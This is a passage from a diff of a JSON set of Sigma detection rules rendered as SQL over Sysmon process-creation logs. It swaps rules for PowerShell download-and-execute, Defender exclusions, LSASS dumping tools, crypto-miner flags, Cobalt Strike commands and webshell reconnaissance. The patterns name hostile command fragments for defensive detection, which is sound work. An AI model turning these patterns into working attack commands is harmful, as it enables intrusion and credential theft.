installers were seen using this method of creation unfortunately. Filter them in your environment" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '% ONLOGON %' ESCAPE '\\' OR CommandLine LIKE '% ONSTART %' ESCAPE '\\' OR CommandLine LIKE '% ONCE %' ESCAPE '\\' OR CommandLine LIKE '% ONIDLE %' ESCAPE '\\') AND (CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM%' ESCAPE '\\' OR CommandLine LIKE '%HIGHEST%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\csexec.exe' ESCAPE '\\' OR Description = 'csexec'))" ], - "filename": "proc_creation_win_schtasks_schedule_type_system.yml" + "filename": "proc_creation_win_pua_csexec.yml" }, { - "title": "Potential Privilege Escalation To LOCAL SYSTEM", - "id": "207b0396-3689-42d9-8399-4222658efc99", - "status": "experimental", - "description": "Detects 
unknown program using commandline flags usually used by tools such as PsExec and PAExec to start programs with SYSTEM Privileges", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "Compress Data and Lock With Password for Exfiltration With 7-ZIP", + "id": "9fbf5927-5261-4284-a71d-f681029ea574", + "status": "test", + "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities", + "author": "frack113", "tags": [ - "attack.resource_development", - "attack.t1587.001" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Weird admins that rename their tools", - "Software companies that bundle PsExec/PAExec with their software and rename it, so that it is less embarrassing" + "Legitimate activity is expected since compressing files with a password is common." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '% -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i -s pwsh%' ESCAPE '\\' OR 
CommandLine LIKE '% -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i -s powershell%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%paexec%' ESCAPE '\\' OR CommandLine LIKE '%PsExec%' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description LIKE '%7-Zip%' ESCAPE '\\' OR (Image LIKE '%\\\\7z.exe' ESCAPE '\\' OR Image LIKE '%\\\\7zr.exe' ESCAPE '\\' OR Image LIKE '%\\\\7za.exe' ESCAPE '\\') OR OriginalFileName IN ('7z.exe', '7za.exe')) AND CommandLine LIKE '% -p%' ESCAPE '\\' AND (CommandLine LIKE '% a %' ESCAPE '\\' OR CommandLine LIKE '% u %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sysinternals_susp_psexec_paexec_flags_.yml" + "filename": "proc_creation_win_7zip_password_compression.yml" }, { - "title": "PowerShell Web Download and Execution", - "id": "85b0b087-eddf-4a2b-b033-d771fa2b9775", + "title": "Potential Product Reconnaissance Via Wmic.EXE", + "id": "15434e33-5027-4914-88d5-3d4145ec25a9", "status": "experimental", - "description": "Detects suspicious ways to download files or content and execute them using PowerShell Invoke-Expression", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of WMIC in order to get a list of firewall and antivirus products", + "author": "Nasreddine Bencherchali", "tags": [ "attack.execution", - "attack.t1059" + "attack.t1047" ], "falsepositives": [ - "Scripts or tools that download files and execute them" + "Unknown" ], - "level": "high", + 
"level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%.DownloadString(%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WebRequest %' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\') AND (CommandLine LIKE '%IEX(%' ESCAPE '\\' OR CommandLine LIKE '%IEX (%' ESCAPE '\\' OR CommandLine LIKE '%I`EX%' ESCAPE '\\' OR CommandLine LIKE '%IE`X%' ESCAPE '\\' OR CommandLine LIKE '%I`E`X%' ESCAPE '\\' OR CommandLine LIKE '%| IEX%' ESCAPE '\\' OR CommandLine LIKE '%|IEX %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Expression%' ESCAPE '\\' OR CommandLine LIKE '%;iex $%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%Product%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_download_iex.yml" + "filename": "proc_creation_win_wmic_recon_product.yml" }, { - "title": "PUA - DIT Snapshot Viewer", - "id": "d3b70aad-097e-409c-9df2-450f80dc476b", - "status": "test", - "description": "Detects the use of Ditsnap tool, an inspection tool for Active Directory database, ntds.dit.", - "author": "Furkan Caliskan (@caliskanfurkan_)", + "title": "Gpresult Display Group Policy Information", + "id": "e56d3073-83ff-4021-90fe-c658e0709e72", + "status": "experimental", + "description": "Detects cases in which a user uses the built-in Windows utility gpresult to display the Resultant Set of Policy (RSoP) information", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.003" + "attack.discovery", + "attack.t1615" ], "falsepositives": [ - "Legitimate admin usage" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ditsnap.exe' 
ESCAPE '\\' OR CommandLine LIKE '%ditsnap.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\gpresult.exe' ESCAPE '\\' AND (CommandLine LIKE '%/z%' ESCAPE '\\' OR CommandLine LIKE '%/v%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_ditsnap.yml" + "filename": "proc_creation_win_gpresult_execution.yml" }, { - "title": "Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE", - "id": "48917adc-a28e-4f5d-b729-11e75da8941f", - "status": "experimental", - "description": "Detects the usage of \"reg.exe\" to add Defender folder exclusions. Qbot has been seen using this technique to add exlcusions for folders within AppData and ProgramData.", - "author": "frack113", + "title": "Potential Crypto Mining Activity", + "id": "66c3b204-9f88-4d0a-a7f7-8a57d521ca55", + "status": "stable", + "description": "Detects command line parameters or strings often used by crypto miners", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.impact", + "attack.t1496" ], "falsepositives": [ - "Legitimate use" + "Legitimate use of crypto miners", + "Some build frameworks" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\reg.exe' ESCAPE '\\' AND (CommandLine LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Exclusions\\\\Paths%' ESCAPE '\\' OR CommandLine LIKE '%SOFTWARE\\\\Microsoft\\\\Microsoft Antimalware\\\\Exclusions\\\\Paths%' ESCAPE '\\') AND CommandLine LIKE '%ADD %' ESCAPE '\\' AND CommandLine LIKE '%/t %' ESCAPE '\\' AND CommandLine LIKE '%REG\\_DWORD %' ESCAPE '\\' AND CommandLine LIKE '%/v %' ESCAPE '\\' AND CommandLine LIKE '%/d %' ESCAPE '\\' AND CommandLine LIKE '%0%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine 
LIKE '% --cpu-priority=%' ESCAPE '\\' OR CommandLine LIKE '%--donate-level=0%' ESCAPE '\\' OR CommandLine LIKE '% -o pool.%' ESCAPE '\\' OR CommandLine LIKE '% --nicehash%' ESCAPE '\\' OR CommandLine LIKE '% --algo=rx/0 %' ESCAPE '\\' OR CommandLine LIKE '%stratum+tcp://%' ESCAPE '\\' OR CommandLine LIKE '%stratum+udp://%' ESCAPE '\\' OR CommandLine LIKE '%LS1kb25hdGUtbGV2ZWw9%' ESCAPE '\\' OR CommandLine LIKE '%0tZG9uYXRlLWxldmVsP%' ESCAPE '\\' OR CommandLine LIKE '%tLWRvbmF0ZS1sZXZlbD%' ESCAPE '\\' OR CommandLine LIKE '%c3RyYXR1bSt0Y3A6Ly%' ESCAPE '\\' OR CommandLine LIKE '%N0cmF0dW0rdGNwOi8v%' ESCAPE '\\' OR CommandLine LIKE '%zdHJhdHVtK3RjcDovL%' ESCAPE '\\' OR CommandLine LIKE '%c3RyYXR1bSt1ZHA6Ly%' ESCAPE '\\' OR CommandLine LIKE '%N0cmF0dW0rdWRwOi8v%' ESCAPE '\\' OR CommandLine LIKE '%zdHJhdHVtK3VkcDovL%' ESCAPE '\\') AND NOT ((CommandLine LIKE '% pool.c %' ESCAPE '\\' OR CommandLine LIKE '% pool.o %' ESCAPE '\\' OR CommandLine LIKE '%gcc -%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_reg_defender_exclusion.yml" + "filename": "proc_creation_win_susp_crypto_mining_monero.yml" }, { - "title": "Griffon Malware Attack Pattern", - "id": "bcc6f179-11cd-4111-a9a6-0fab68515cf7", - "status": "experimental", - "description": "Detects process execution patterns related to Griffon malware as reported by Kaspersky", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Exploit for CVE-2017-8759", + "id": "fdd84c68-a1f6-47c9-9477-920584f94905", + "status": "test", + "description": "Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution" + "attack.execution", + "attack.t1203", + "attack.t1204.002", + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine 
LIKE '%\\\\local\\\\temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%//b /e:jscript%' ESCAPE '\\' AND CommandLine LIKE '%.txt%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' AND Image LIKE '%\\\\csc.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_griffon_patterns.yml" + "filename": "proc_creation_win_exploit_cve_2017_8759.yml" }, { - "title": "Potential Tampering With RDP Related Registry Keys Via Reg.EXE", - "id": "0d5675be-bc88-4172-86d3-1e96a4476536", - "status": "experimental", - "description": "Detects the execution of \"reg.exe\" for enabling/disabling the RDP service on the host by tampering with the 'CurrentControlSet\\Control\\Terminal Server' values", - "author": "pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport", + "title": "WSF/JSE/JS/VBA/VBE File Execution", + "id": "1e33157c-53b1-41ad-bbcc-780b80b58288", + "status": "test", + "description": "Detects suspicious file execution by wscript and cscript", + "author": "Michael Haag", "tags": [ - "attack.defense_evasion", - "attack.lateral_movement", - "attack.t1021.001", - "attack.t1112" + "attack.execution", + "attack.t1059.005", + "attack.t1059.007" ], "falsepositives": [ - "Unknown" + "Will need to be tuned. I recommend adding the user profile path in CommandLine if it is getting too noisy." 
], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '%\\\\CurrentControlSet\\\\Control\\\\Terminal Server%' ESCAPE '\\' AND CommandLine LIKE '%REG\\_DWORD%' ESCAPE '\\' AND CommandLine LIKE '% /f%' ESCAPE '\\')) AND ((CommandLine LIKE '%Licensing Core%' ESCAPE '\\' AND CommandLine LIKE '%EnableConcurrentSessions%' ESCAPE '\\') OR (CommandLine LIKE '%WinStations\\\\RDP-Tcp%' ESCAPE '\\' OR CommandLine LIKE '%MaxInstanceCount%' ESCAPE '\\' OR CommandLine LIKE '%fEnableWinStation%' ESCAPE '\\' OR CommandLine LIKE '%TSUserEnabled%' ESCAPE '\\' OR CommandLine LIKE '%TSEnabled%' ESCAPE '\\' OR CommandLine LIKE '%TSAppCompat%' ESCAPE '\\' OR CommandLine LIKE '%IdleWinStationPoolCount%' ESCAPE '\\' OR CommandLine LIKE '%TSAdvertise%' ESCAPE '\\' OR CommandLine LIKE '%AllowTSConnections%' ESCAPE '\\' OR CommandLine LIKE '%fSingleSessionPerUser%' ESCAPE '\\' OR CommandLine LIKE '%fDenyTSConnections%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName IN ('wscript.exe', 'cscript.exe') OR (Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\')) AND (CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.jse%' ESCAPE '\\' OR CommandLine LIKE '%.vba%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_rdp_keys_tamper.yml" + "filename": "proc_creation_win_script_execution.yml" }, { - "title": "Custom Class Execution via Xwizard", - "id": "53d4bb30-3f36-4e8a-b078-69d36c4a79ff", + "title": "Tap Installer Execution", + "id": "99793437-3e16-439b-be0f-078782cf953d", "status": "test", - "description": "Detects the execution of Xwizard tool with 
specific arguments which utilized to run custom class properties.", - "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", + "description": "Well-known TAP software installation. Possible preparation for data exfiltration using tunneling techniques", + "author": "Daniil Yugoslavskiy, Ian Davis, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.exfiltration", + "attack.t1048" ], "falsepositives": [ - "Unknown" + "Legitimate OpenVPN TAP insntallation" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\xwizard.exe' ESCAPE '\\' AND CommandLine REGEXP '\\{[a-fA-F0-9]{8}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{12}\\}')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\tapinstall.exe' ESCAPE '\\' AND NOT (((Image LIKE 'C:\\\\Program Files\\\\Avast Software\\\\SecureLine VPN\\\\tapinstall.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Avast Software\\\\SecureLine VPN\\\\tapinstall.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Program Files\\\\OpenVPN Connect\\\\drivers\\\\tap\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Proton Technologies\\\\ProtonVPNTap\\\\installer\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_class_exec_xwizard.yml" + "filename": "proc_creation_win_tapinstall_execution.yml" }, { - "title": "Gzip Archive Decode Via PowerShell", - "id": "98767d61-b2e8-4d71-b661-e36783ee24c1", + "title": "Renamed Remote Utilities RAT (RURAT) Execution", + "id": "9ef27c24-4903-4192-881a-3adde7ff92a5", "status": "experimental", - "description": "Detects attempts of decoding encoded Gzip archives via PowerShell.", - "author": "Hieu Tran", + "description": "Detects execution of renamed Remote Utilities (RURAT) via Product PE header field", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + 
"attack.defense_evasion", + "attack.collection", + "attack.command_and_control", + "attack.discovery", + "attack.s0592" + ], "falsepositives": [ - "Legitimate administrative scripts may use this functionality. Use \"ParentImage\" in combination with the script names and allowed users and applications to filter legitimate executions" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%GZipStream%' ESCAPE '\\' AND CommandLine LIKE '%::Decompress%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Product = 'Remote Utilities' AND NOT ((Image LIKE '%\\\\rutserv.exe' ESCAPE '\\' OR Image LIKE '%\\\\rfusclient.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_decode_gzip.yml" + "filename": "proc_creation_win_renamed_rurat.yml" }, { - "title": "Suspicious Parent of Csc.exe", - "id": "b730a276-6b63-41b8-bcf8-55930c8fc6ee", - "status": "test", - "description": "Detects a suspicious parent of csc.exe, which could by a sign of payload delivery", - "author": "Florian Roth (Nextron Systems)", + "title": "Import PowerShell Modules From Suspicious Directories - ProcCreation", + "id": "c31364f7-8be6-4b77-8483-dd2b5a7b69a3", + "status": "experimental", + "description": "Detects powershell scripts that import modules from suspicious directories", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059.005", - "attack.t1059.007", - "attack.defense_evasion", - "attack.t1218.005", - "attack.t1027.004" + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\csc.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR 
ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Import-Module \"$Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module ''$Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module $Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module \"$Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module ''$Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module $Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo \"$Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo ''$Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo $Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo \"$Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo ''$Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo $Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo C:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_csc_susp_parent.yml" + "filename": "proc_creation_win_powershell_import_module_susp_dirs.yml" }, { - "title": "HackTool - CreateMiniDump Execution", - "id": "36d88494-1d43-4dc0-b3fa-35c8fea0ca9d", + "title": "PowerShell Get-Clipboard Cmdlet Via CLI", + "id": "b9aeac14-2ffd-4ad3-b967-1354a4e628c3", "status": "test", - "description": "Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects usage of the 'Get-Clipboard' cmdlet via CLI", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.collection", + "attack.t1115" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\CreateMiniDump.exe' ESCAPE '\\' OR Imphash = '4a07f944a83e8a7c2525efa35dd30e2f' OR Hashes LIKE '%IMPHASH=4a07f944a83e8a7c2525efa35dd30e2f%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Get-Clipboard%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_createminidump.yml" + "filename": "proc_creation_win_powershell_get_clipboard.yml" }, { - "title": "LOLBIN Execution Of The FTP.EXE Binary", - "id": "06b401f4-107c-4ff9-947f-9ec1e7649f1e", + "title": "Interactive AT Job", + "id": "60fc936d-2eb0-4543-8a13-911c750a1dfc", "status": "test", - "description": "Detects execution of ftp.exe script execution with the \"-s\" flag and any child processes ran by ftp.exe", - "author": "Victor Sergeev, oscd.community", + "description": "Detects an interactive AT job, which may be used as a form of privilege escalation.", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "tags": [ - "attack.execution", - "attack.t1059", - "attack.defense_evasion", - "attack.t1202" + "attack.privilege_escalation", + "attack.t1053.002" ], "falsepositives": [ - "Unknown" + "Unlikely (at.exe deprecated as of Windows 8)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\ftp.exe' ESCAPE '\\' OR ((Image LIKE '%\\\\ftp.exe' ESCAPE '\\' OR OriginalFileName = 'ftp.exe') AND CommandLine LIKE '%-s:%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\at.exe' ESCAPE '\\' AND CommandLine LIKE '%interactive%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_ftp.yml" + "filename": "proc_creation_win_at_interactive_execution.yml" }, { - "title": "Suspicious GrpConv Execution", - "id": 
"f14e169e-9978-4c69-acb3-1cff8200bc36", + "title": "Operator Bloopers Cobalt Strike Modules", + "id": "4f154fb6-27d1-4813-a759-78b93e0b9c48", "status": "experimental", - "description": "Detects the suspicious execution of a utility to convert Windows 3.x .grp files or for persistence purposes by malicious software or actors", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Cobalt Strike module/commands accidentally entered in CMD shell", + "author": "_pete_0, TheDFIRReport", "tags": [ - "attack.persistence", - "attack.t1547" + "attack.execution", + "attack.t1059.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%grpconv.exe -o%' ESCAPE '\\' OR CommandLine LIKE '%grpconv -o%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'Cmd.Exe' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ShareFinder%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SMBAutoBrute%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR CommandLine LIKE '%zerologon%' ESCAPE '\\' OR CommandLine LIKE '%av\\_query%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_susp_grpconv.yml" + "filename": "proc_creation_win_hktl_cobaltstrike_bloopers_modules.yml" }, { - "title": "UAC Bypass Using IDiagnostic Profile", - "id": "4cbef972-f347-4170-b62a-8253f6168e6d", + "title": "Potential System Information Discovery Via Wmic.EXE", + "id": "9d5a1274-922a-49d0-87f3-8c653483b909", "status": "experimental", - "description": "Detects the \"IDiagnosticProfileUAC\" UAC bypass technique", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the use of the WMI command-line (WMIC) utility to 
identify and display various system information,\nincluding OS, CPU, GPU, and disk drive names; memory capacity; display resolution; and baseboard, BIOS,\nand GPU driver products/versions.\nSome of these commands were used by Aurora Stealer in late 2022/early 2023.\n", + "author": "TropChaud", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.discovery", + "attack.t1082" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% /Processid:{12C21EA7-2EB8-4B55-9249-AC243DA8C666}%' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'WMI Commandline Utility' OR OriginalFileName = 'wmic.exe' OR Image LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND (CommandLine LIKE '%cpu get name%' ESCAPE '\\' OR CommandLine LIKE '%MEMPHYSICAL get MaxCapacity%' ESCAPE '\\' OR CommandLine LIKE '%baseboard get product%' ESCAPE '\\' OR CommandLine LIKE '%baseboard get version%' ESCAPE '\\' OR CommandLine LIKE '%bios get SMBIOSBIOSVersion%' ESCAPE '\\' OR CommandLine LIKE '%path win32\\_VideoController get name%' ESCAPE '\\' OR CommandLine LIKE '%path win32\\_VideoController get DriverVersion%' ESCAPE '\\' OR CommandLine LIKE '%path win32\\_VideoController get VideoModeDescription%' ESCAPE '\\' OR CommandLine LIKE '%OS get Caption,OSArchitecture,Version%' ESCAPE '\\' OR CommandLine LIKE '%DISKDRIVE get Caption%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_idiagnostic_profile.yml" + "filename": "proc_creation_win_wmic_recon_system_info_discovery.yml" }, { - "title": "Webshell Detection With Command Line Keywords", - "id": "bed2a484-9348-4143-8a8a-b801c979301c", - "status": "experimental", - 
"description": "Detects certain command line parameters often used during reconnaissance activity via web shells", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, Anton Kutepov, oscd.community", + "title": "PUA - Nmap/Zenmap Execution", + "id": "f6ecd1cf-19b8-4488-97f6-00f0924991a3", + "status": "test", + "description": "Detects usage of namp/zenmap. Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1505.003", - "attack.t1018", - "attack.t1033", - "attack.t1087" + "attack.discovery", + "attack.t1046" ], "falsepositives": [ - "Unknown" + "Network administrator computer" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentImage LIKE '%-tomcat-%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND 